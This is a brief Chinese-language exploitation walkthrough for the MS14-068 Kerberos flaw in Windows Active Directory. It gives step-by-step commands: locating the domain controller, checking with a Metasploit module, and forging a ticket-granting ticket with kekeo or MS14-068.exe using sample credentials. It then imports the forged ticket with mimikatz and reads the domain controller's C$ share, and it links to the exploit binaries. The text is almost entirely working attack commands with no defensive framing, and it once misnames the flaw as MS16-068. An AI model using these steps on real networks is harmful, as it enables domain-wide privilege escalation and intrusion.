一、利用
需要擁有一個域賬號的賬號密碼明文
net group "domain controllers" /domain 獲取主域控地址
使用msf對其漏洞進行檢測,如果漏洞利用成功會生成一個bin文件
poc:use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
利用工具:https://github.com/gentilkiwi/kekeo/releases
上傳exp至臨時目錄
klist 列出票據
klist purge 清除票據
kekeo.exe "exploit::ms14068 /domain:yiwang.com /user:admin123 /password:admin@AAA... /ptt" "exit"
漏洞利用成功后成功訪問域控c$目錄
方法二、
防止以msf爆出神奇操作,以msf檢測漏洞為標准的情況所以...
MS14-068:https://raw.githubusercontent.com/abatchy17/WindowsExploits/master/MS14-068/MS14-068.exe
漏洞利用:
Ms14-068.exe -u user1@humensec.com -p user@123 -s S-1-5-21-3858644736-3974512303-642681968-1134 -d 192.168.3.12
漏洞利用成功后桌面會生成 .ccache文件,證明存在MS16-068
mimikatz# kerberos::purge#清除原有票據
mimikatz# kerberos::list #列出當前票據,確保清除干凈
mimikatz# kerberos::ptc TGT_XXX.ccache #將偽造的TGT導入內存
dir \\域控\\c$
多dir幾次有可能會拒絕訪問
參考鏈接:
https://www.cnblogs.com/yuzly/p/10859520.html